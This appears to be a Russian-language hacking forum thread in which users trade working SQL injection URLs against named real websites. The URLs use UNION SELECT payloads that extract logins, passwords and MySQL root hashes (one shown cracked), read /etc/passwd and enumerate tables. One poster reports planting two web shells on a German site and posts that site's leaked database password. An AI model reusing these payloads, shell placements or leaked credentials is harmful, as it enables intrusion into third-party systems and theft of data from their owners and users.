SQL Инъекции

HTML:

http://www.trubka.ru/cellular/phone.php?id=-1072+UNION+SELECT+1,2,concat(login,0x3b,pass),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33+from+login/*

ДБ 4
нашёл 3 базы admin,news,login

HTML:

http://mobila.gipershop.net.ua/descript.php?kodmob=493+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11/*

ДБ 4...чёта таблиц не нашёл

 

Code:

http://www.sreda-mag.ru/faq_one.phtml?id=-680+union+select+1,2,3,4,5,6,id,8,9,10,11,12,13,14,15,concat(login,CHAR(58),parol),17,18+from+prepods+where+id=18/*

Нужно перебирать id.

Code:

http://www.sreda-mag.ru/faq_one.phtml?id=-680+union+select+1,2,3,4,5,6,id,8,9,10,11,12,13,14,15,concat(login,CHAR(58),parol),17,18+from+prepods+where+login<>CHAR(32)+and+login<>CHAR(107,114,97,118,99,104,101,110,107,111)+and+login<>CHAR(100,97,114,105,97)/*

Можно еще таким извратом делать
Одно но..... пробую входить под получеными данными - нифига не получается, может кто додумает как и что...

 

http://www.laptopshowcase.co.uk/downloads.php?id=1
Подобирать столбцы необходимо с помошью group+by

Code:

Mixing of GROUP columns (MIN(),MAX(),COUNT()...) with no GROUP columns is illegal if there is no GROUP BY clause

В итоге правельным будет следующий запрос

_http://www.laptopshowcase.co.uk/downloads.php?id=-1+group+by+10+union+select+1,2,version(),4,5,6,7,8,9,0,11/*

 

italia.allaboutjazz.com

Code:

http://italia.allaboutjazz.com/php/article.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,concat_ws(0x3a,version(),database(),user()),22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70/*

4.1.20:italy:[email protected]
доступ к mysql.user закрыт

 

media.uoa.gr

Code:

http://www.media.uoa.gr/yasmin/viewtopic.php?t=-1+union+select+1,2,concat_ws(0x3a,version(),database(),user()),4,5,6,7,8,9,10,11,12,13,14/*

4.0.21:yasmin:nobody@localhost

root:

Code:

http://www.media.uoa.gr/yasmin/viewtopic.php?t=-1+union+select+1,2,concat_ws(0x3a,user,password),4,5,6,7,8,9,10,11,12,13,14+from+mysql.user/*

root:13a2d19842b1bd5c

 

medizin-controller.de

Code:

http://www.medizin-controller.de/news.php?id_news=-1+union+select+1,concat_ws(0x3a,version(),database(),user()),3,4,5/*

5.0.32-Debian_7etch1~bpo.1-log:medizincontroller_de:[email protected]

56 таблиц:

Code:

http://www.medizin-controller.de/news.php?id_news=-1+union+select+1,table_name,3,4,5+from+information_schema.tables+limit+55,1/*

залил два shell-a:

Code:

http://www.medizin-controller.de/archiv/sh.php

Code:

http://www.medizin-controller.de/archiv/rsh.php

данные из connect.php:

$server = "mysql5.webpack.hosteurope.de";
$user = "ftp25366";
$pass = "avatar";
$db = "medizincontroller_de";

 

Если кто подберёт, скинте.

104.2 fm в МСК.

 

зачем?
можешь почитать оч. старое сообщение ZaCo /https://antichat.ru/printthread.php?t=10601&pp=40/, эту дурку ещё не прикрыли, там по памяти он даже видео снял.

вот тебе для проверки http://www.energyfm.ru/?an=foto_slu&condition=czIgbGlrZSAnbm9fbmFtZScgdW5pb24gc2VsZWN0IDEsMix2ZXJzaW9uKCksNCw1LDYsNyw4LDksMCwxLDIsMyw0LDUsNiw3LDgsOSwwLDEsMiwzLDQsNSw2LDcsOCw5

 

www.maika.by

вот сама скуля:

Code:

http://www.maika.by/index.php?path=products&id=-45%20union%20select%201,2,3,4,5,6,7,8,9,10/*

мускул 5 ветки, file_priv нет, доступа к mysql.user тоже нет, ковычки фильтруются

но интересно другое, эта скуля позволяет инклюдить файлы например:

Code:

http://www.maika.by/index.php?path=products&id=-45%20union%20select%201,2,3,4,0x2F6574632F706173737764,6,7,8,9,10/*

инклюдит /etc/passwd, данные из 5 колонки в чистом виде передаются в функцию main()

Скорее всего возможен инклюд, не только локальных файлов, но у меня неполучилось это проверить, (слишком долго связывается с народом)

на серве есть еще несколько сайтов подобной тематики

 

XAKEP.RU

Гыыы скуля на ксакепе

Code:

http://www.xakep.ru/articles/Links/result.asp?tosearch=theme=1+or+1=@@version

кстати я там скули 3-4 нашел, но они не особо перспективные

 

вот оно же но более раскрученно

Code:

http://www.spmi.ru/index.php?id=6&t=show_news&nid=1' UNION SELECT '1',VERSION(),3 WHERE 1=1--

 

http://www.spmi.ru/index.php?t=skeleton'&id=3&lang=1
там же

 

Megashara

Code:

http://megashara.com/item.php?tid=-1'%20union%20select%201,2,3,4,5,6,7,8,user,10,11,12,13,14,15,16,17,18,19,20,21,22,password,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38%20from%20mysql.user/*

Таблица mysql.user Доступна
root:*111921C1B9EE2D4BD4C825031689DCD63239883F
После расшифровки root: ghjcnjgfhjkm

Админку не нашёл.
З.Ы странно после нахождения скули сайт глючить стал

 

http://www.spmi.ru/index.php?id=6&t=show_news&nid=1'%20UNION%20SELECT%20null,user,null%20WHERE%201=1--
Че дальше можно наворотить?

 

Там кажецо PostgreSQL читай ФАКи
http://forum.antichat.ru/showthread.php?t=35599

 

При помощи фака раздирбанил постгресс и узнал логины:пассы... Вот только их там дохрена и самые вероятные на админку не подходят((((((

 

http://www.samaranews.ru/work/view1.php?type_category=1&id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,concat_ws(0x2F,version(),database(),user()),14,15,16,17,18/*

4.1.21-community-max-nt-log/1gb_samara/[email protected]

--------------------------------------------------------------------

http://www.yes.spata.ru/index.php?a=-1+union+select+concat_ws(0x2F,version(),database(),user()),2,3,4/*

4.1.21-standard-log/spataru_yes/spataru_yes@localhost

--------------------------------------------------------------------

http://www.list.mini-soft.ru/full_link.php?nID=-1+union+select+1,2,concat_ws(0x2F,version(),database(),user()),4,5,6,7,8,9,10,11/*

4.0.18-log/minisof5_cat/minisof5_admin3@localhost

--------------------------------------------------------------------

http://www.wir1.domenonline.ru/cgi-bin/podrob.pl?id=-1+union+select+1,concat_ws(0x2F,version(),database(),user()),3/*

4.0.27-standard-log/wirru_wir83wir1/wirru_wir@localhost

--------------------------------------------------------------------

http://www.elfworld.ru/articles/index.php?mode=section&id=-1'+union+select+1,1,concat_ws(0x2F,cast(version()+as+binary),cast(database()+as+binary),cast(user()+as+binary)),1,1,1,1/*

4.0.24_Debian-10sarge2-log/erynrandir_elfw/erynrandir_elfw@localhost

 

Code:

http://www.yuretz.ru/prikol.php?id=9999+union+select+1,concat_ws(0x2F,version(),database(),user()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17/*

5.0.45-community/yuretz/yuretz@localhost

===========================================

Code:

http://www.trud.ru/issue/shortnews.php?id=-64079+union+select+1,2,concat_ws(0x2F,user(),database(),version()),load_file('etc/passwd/'),5,6,7/*

trudinfo@localhost/trudinfo_db/4.1.21-log

 

http://www.colorprint.ru/index.php?id=-37+union+select+concat_ws(0x2F,version(),database()%20,user()),2,3,4,5,6,7/*

 

anti-crime.org - Антикримінальний вибір
4.1.20:akv@localhost:usrdb_extaxobh_testakv

Code:

http://www.anti-crime.org/search.php?avtor=-1'+union+select+1,2,3,4,concat(version(),char(58),user(),char(58),database()),6,7/*

Есть таблицы:
grani_main (ni, podvodka, st_type, tmstamp, zag, avtor, is_public)
akv_forum
party
P.S.: К сожалению нет доступа к базам mysql и information_schema